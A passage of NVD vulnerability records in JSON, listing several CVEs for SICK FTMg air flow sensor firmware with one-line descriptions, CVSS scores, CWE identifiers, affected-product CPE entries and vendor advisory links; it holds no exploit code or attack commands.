egate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23446","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.160","lastModified":"2026-06-01T13:16:22.957","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in SICK FTMg AIR FLOW SENSOR with Partnumbers\n1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged remote attacker to download files by using a therefore unpriviledged account via the REST interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23447","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.217","lastModified":"2026-06-01T13:16:23.123","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged\nremote attacker to influence the availability of the webserver by invocing several open file requests via\nthe REST interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23448","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.280","lastModified":"2026-06-01T13:16:23.287","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Inclusion of Sensitive Information in Source Code in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows a\nremote attacker to gain information about valid usernames via analysis of source code."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-540"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-668"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23449","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.347","lastModified":"2026-06-01T13:16:23.467","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Observable Response Discrepancy in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows a remote attacker\nto gain information about valid usernames by analyzing challenge responses from the server via the\nREST interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-204"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-203"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23450","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.407","lastModified":"2026-06-01T13:16:23.607","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Use of Password Hash Instead of Password for Authentication in SICK FTMg AIR\nFLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526\nallows an unprivileged remote attacker to use a password hash instead of an actual password to login\nto a valid user account via the REST interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.5,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-836"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CW